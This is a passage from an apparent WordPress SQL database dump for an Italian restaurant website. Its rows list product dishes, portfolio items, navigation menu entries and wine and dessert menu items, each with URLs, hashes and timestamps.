13:21:56',1,NULL,NULL,NULL,NULL,0,NULL),(885,'https://www.ristorantesolymar.it/vecchio/prodotto/crispy-tuna-artichoke/','72:bd4cd1afc7e3204a76d44ba5743b62ea',98,'post','product',1,0,NULL,NULL,'Crispy Tuna Artichoke','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:19','2021-02-18 16:08:41',1,NULL,NULL,NULL,NULL,0,NULL),(886,'https://www.ristorantesolymar.it/vecchio/prodotto/lettuce-beet-wraps/','69:8f565f9932f5e3bc87ec2b8a4c7e41fb',3107,'post','product',1,0,NULL,NULL,'Lettuce &#038; Beet Wraps','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:19','2021-02-22 11:14:57',1,NULL,NULL,NULL,NULL,0,NULL),(887,'https://www.ristorantesolymar.it/vecchio/prodotto/vegan-charcuterie/','68:8aa30cc9b479095bafe7631866a28ee9',3108,'post','product',1,0,NULL,NULL,'Vegan Charcuterie','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:19','2021-02-01 14:28:15',1,NULL,NULL,NULL,NULL,0,NULL),(888,'https://www.ristorantesolymar.it/vecchio/prodotto/tofu-citrus-romaine/','70:3531892b92383d94b832f9e8b4931c61',3109,'post','product',1,0,NULL,NULL,'Tofu Citrus Romaine','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:19','2021-02-17 16:10:37',1,NULL,NULL,NULL,NULL,0,NULL),(889,'https://www.ristorantesolymar.it/vecchio/prodotto/beet-dip-eggs/','64:dff2ffe3523fb8555360274a36739e50',3110,'post','product',1,0,NULL,NULL,'Beet Dip &#038; Eggs','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:19','2021-02-21 12:35:55',1,NULL,NULL,NULL,NULL,0,NULL),(890,'https://www.ristorantesolymar.it/vecchio/prodotto/ham-melt-with-lettuce/','72:a970255a85f764726fa047af9d43ffde',3111,'post','product',1,0,NULL,NULL,'Ham Melt With Lettuce','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:19','2021-02-03 18:05:44',1,NULL,NULL,NULL,NULL,0,NULL),(891,'https://www.ristorantesolymar.it/vecchio/prodotto/caviar-pancakes/','66:64ff4ab0ee93be2b2efbbfbb9e082cbd',177,'post','product',1,0,NULL,NULL,'Caviar Pancakes','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:19','2021-02-06 15:38:25',1,NULL,NULL,NULL,NULL,0,NULL),(892,'https://www.ristorantesolymar.it/vecchio/prodotto/creamy-garlic-shrimp/','71:89088b4e2ec2e1b4c802b833203c99ba',180,'post','product',1,0,NULL,NULL,'Creamy Garlic Shrimp','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:19','2021-02-08 03:02:55',1,NULL,NULL,NULL,NULL,0,NULL),(893,'https://www.ristorantesolymar.it/vecchio/prodotto/smoked-pork-jowl/','67:b4393e919b19bec42cdbd687dfbc4e12',3112,'post','product',1,0,NULL,NULL,'Smoked Pork Jowl','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-02-23 11:54:49',1,NULL,NULL,NULL,NULL,0,NULL),(894,'https://www.ristorantesolymar.it/vecchio/prodotto/fruit-sponge-cake/','68:ecd88b45be47640c37bcd53c4f114a63',3113,'post','product',1,0,NULL,NULL,'Fruit Sponge Cake','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-02-17 08:00:32',1,NULL,NULL,NULL,NULL,0,NULL),(895,'https://www.ristorantesolymar.it/vecchio/prodotto/fish-in-fruit-sauce/','70:a7bebb89131f1b8791342d7f935a13fa',3114,'post','product',1,0,NULL,NULL,'Fish In Fruit Sauce','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-02-25 08:16:34',1,NULL,NULL,NULL,NULL,0,NULL),(1589,NULL,NULL,3766,'post','nav_menu_item',1,0,NULL,NULL,'Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:33','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1590,NULL,NULL,3767,'post','nav_menu_item',1,0,NULL,NULL,'Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:33','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1591,'https://www.ristorantesolymar.it/vecchio/portfolio-item/vegetables/','67:2bb10d8b3e9caac917a0b81f8a8d6ed6',2898,'post','portfolio-item',1,0,NULL,NULL,'Vegetables','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:34','2021-02-04 19:17:03',1,NULL,NULL,NULL,NULL,0,NULL),(897,NULL,NULL,75,'term','post_format',NULL,NULL,NULL,NULL,'Video',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1592,'https://www.ristorantesolymar.it/vecchio/portfolio-item/taste-cold-fruit/','73:69cb704d8b78df5a8c585abe291deead',2901,'post','portfolio-item',1,0,NULL,NULL,'Taste Cold Fruit','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:34','2021-02-04 19:17:12',1,NULL,NULL,NULL,NULL,0,NULL),(1593,'https://www.ristorantesolymar.it/vecchio/portfolio-item/delicious-vitamin-salad/','80:20a8c81768404e57824ac7da2a0bc5e8',2902,'post','portfolio-item',1,0,NULL,NULL,'Delicious Vitamin Salad','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:34','2021-02-04 19:17:22',1,NULL,NULL,NULL,NULL,0,NULL),(1594,'https://www.ristorantesolymar.it/vecchio/portfolio-item/taste-sweet-dream/','74:46e021a94c7fa614832d68ef39722da2',2903,'post','portfolio-item',1,0,NULL,NULL,'Taste Sweet Dream','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:34','2021-02-04 19:17:52',1,NULL,NULL,NULL,NULL,0,NULL),(899,NULL,NULL,76,'term','post_format',NULL,NULL,NULL,NULL,'Quote',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1585,NULL,NULL,3762,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:33','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1586,NULL,NULL,3763,'post','nav_menu_item',1,0,NULL,NULL,'Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:33','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1587,NULL,NULL,3764,'post','nav_menu_item',1,0,NULL,NULL,'Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:33','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1588,NULL,NULL,3765,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:33','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(901,NULL,NULL,77,'term','post_format',NULL,NULL,NULL,NULL,'Link',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1582,NULL,NULL,3759,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:33','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1583,NULL,NULL,3760,'post','nav_menu_item',1,0,NULL,NULL,'Post Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:33','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1584,NULL,NULL,3761,'post','nav_menu_item',1,0,NULL,NULL,'Post Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:33','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(903,NULL,NULL,78,'term','post_format',NULL,NULL,NULL,NULL,'Audio',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1556,NULL,NULL,3733,'post','nav_menu_item',1,0,NULL,NULL,'Elements','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1557,NULL,NULL,3734,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1558,NULL,NULL,3735,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(905,NULL,NULL,79,'term','post_format',NULL,NULL,NULL,NULL,'Gallery',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1553,NULL,NULL,3730,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1554,NULL,NULL,3731,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1555,NULL,NULL,3732,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1550,NULL,NULL,3727,'post','nav_menu_item',1,0,NULL,NULL,'Elements','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1551,NULL,NULL,3728,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1552,NULL,NULL,3729,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(908,'https://www.ristorantesolymar.it/vecchio/prodotto/lime-juice-salad/','67:88bcd521727332be3ddc5d49170e0a11',3115,'post','product',1,0,NULL,NULL,'Lime Juice Salad','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-02-16 08:28:07',1,NULL,NULL,NULL,NULL,0,NULL),(909,'https://www.ristorantesolymar.it/vecchio/prodotto/tuna-avocado-blt/','67:3f80da52868874e79732ec1854748ddb',3116,'post','product',1,0,NULL,NULL,'Tuna &#038; Avocado BLT','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-02-06 04:16:44',1,NULL,NULL,NULL,NULL,0,NULL),(910,'https://www.ristorantesolymar.it/vecchio/prodotto/broccoli-cremesoup/','69:a04f409c48058044bc12d379537e0918',3117,'post','product',1,0,NULL,NULL,'Broccoli Cremesoup','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-02-01 10:24:01',1,NULL,NULL,NULL,NULL,0,NULL),(911,'https://www.ristorantesolymar.it/vecchio/prodotto/seaweed-risotto/','66:09c2cce208e59c9e3576f4f0279957f5',3118,'post','product',1,0,NULL,NULL,'SeaWeed Risotto','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-02-21 11:39:04',1,NULL,NULL,NULL,NULL,0,NULL),(912,'https://www.ristorantesolymar.it/vecchio/prodotto/sushi-tuna-maki/','66:b4912da138502fddc322530926bb19a7',3119,'post','product',1,0,NULL,NULL,'Sushi Tuna Maki','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-03-01 18:16:59',1,NULL,NULL,NULL,NULL,0,NULL),(913,'https://www.ristorantesolymar.it/vecchio/prodotto/tofu-fungi-cake/','66:4244ccacb45fd62e17db91d9c8a8820d',3120,'post','product',1,0,NULL,NULL,'Tofu Fungi Cake','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:20','2021-02-01 20:08:55',1,NULL,NULL,NULL,NULL,0,NULL),(914,'https://www.ristorantesolymar.it/vecchio/prodotto/antipasto-with-radish/','72:80d20f365a9d4475007cd1bbd92dc476',3121,'post','product',1,0,NULL,NULL,'Antipasto With Radish','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-02-08 08:59:47',1,NULL,NULL,NULL,NULL,0,NULL),(915,'https://www.ristorantesolymar.it/vecchio/prodotto/butter-fish-cakes/','68:0052ad3cc04307bfbd4f45841220e020',3122,'post','product',1,0,NULL,NULL,'Butter Fish Cakes','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-02-01 13:38:58',1,NULL,NULL,NULL,NULL,0,NULL),(916,'https://www.ristorantesolymar.it/vecchio/prodotto/french-almond-cake/','69:b8fb150f554bf0fcd89914e4187bdfe2',528,'post','product',1,0,NULL,NULL,'French Almond Cake','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-02-05 12:03:24',1,NULL,NULL,NULL,NULL,0,NULL),(917,'https://www.ristorantesolymar.it/vecchio/prodotto/salted-fresh-oysters/','71:42ac42b46d3935c7be52712d3fd8e1f0',530,'post','product',1,0,NULL,NULL,'Salted Fresh Oysters','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-02-18 10:09:52',1,NULL,NULL,NULL,NULL,0,NULL),(918,'https://www.ristorantesolymar.it/vecchio/prodotto/vegan-lemon-gremolata/','72:a5017cc435e3e04e404a3564c14887a5',3123,'post','product',1,0,NULL,NULL,'Vegan Lemon Gremolata','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-02-03 02:34:53',1,NULL,NULL,NULL,NULL,0,NULL),(919,'https://www.ristorantesolymar.it/vecchio/prodotto/stuffed-shrimp-shell/','71:17df84fab47feb724821f64e06d17b2c',3124,'post','product',1,0,NULL,NULL,'Stuffed Shrimp Shell','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-31 21:51:54',1,NULL,NULL,NULL,NULL,0,NULL),(920,'https://www.ristorantesolymar.it/vecchio/prodotto/cream-fungus-soup/','68:7f6f8c1e4f8579674a8c861734f198af',3125,'post','product',1,0,NULL,NULL,'Cream Fungus Soup','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-02-01 17:04:02',1,NULL,NULL,NULL,NULL,0,NULL),(921,'https://www.ristorantesolymar.it/vecchio/prodotto/marinated-oysters/','68:d00c0234d62caee9dd7f3fb9dbfa143a',3126,'post','product',1,0,NULL,NULL,'Marinated Oysters','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-02-20 04:15:01',1,NULL,NULL,NULL,NULL,0,NULL),(922,NULL,NULL,3127,'post','restaurant-menu',1,0,NULL,NULL,'Cookie Cheesecake','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(923,NULL,NULL,3128,'post','restaurant-menu',1,0,NULL,NULL,'Margarita Cupcakes','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(924,NULL,NULL,3129,'post','restaurant-menu',1,0,NULL,NULL,'Butterbeer Pie','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(925,NULL,NULL,3130,'post','restaurant-menu',1,0,NULL,NULL,'GinTonic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(926,NULL,NULL,3131,'post','restaurant-menu',1,0,NULL,NULL,'Fruity Desserts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(927,NULL,NULL,3132,'post','restaurant-menu',1,0,NULL,NULL,'Blueberry Desserts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(928,NULL,NULL,3133,'post','restaurant-menu',1,0,NULL,NULL,'Halloween Candy','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(929,NULL,NULL,3134,'post','restaurant-menu',1,0,NULL,NULL,'Strawberry Pizza','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(930,NULL,NULL,3135,'post','restaurant-menu',1,0,NULL,NULL,'Aubry 1er Cru Brut','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(931,NULL,NULL,3136,'post','restaurant-menu',1,0,NULL,NULL,'Chateau Marguii Rose 2016','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(932,NULL,NULL,3137,'post','restaurant-menu',1,0,NULL,NULL,'Clos Tue Boeuf &#8216;Petit Blanc&#8217; 2016','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(933,NULL,NULL,3138,'post','restaurant-menu',1,0,NULL,NULL,'Niepoort &#8216;Redoma Branco&#8217; 2015','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(934,NULL,NULL,3139,'post','restaurant-menu',1,0,NULL,NULL,'Guillot Broux &#8216;Genievrieres&#8217; 2015','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(935,NULL,NULL,3140,'post','restaurant-menu',1,0,NULL,NULL,'Day Wines &#8216;Cancilla Vineyard&#8217; 2014','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(936,NULL,NULL,3141,'post','restaurant-menu',1,0,NULL,NULL,'Chateau Marguii Rose 2014','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(937,NULL,NULL,3142,'post','restaurant-menu',1,0,NULL,NULL,'Clos Tue Boeuf &#8216;Petit Blanc&#8217; 2013','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 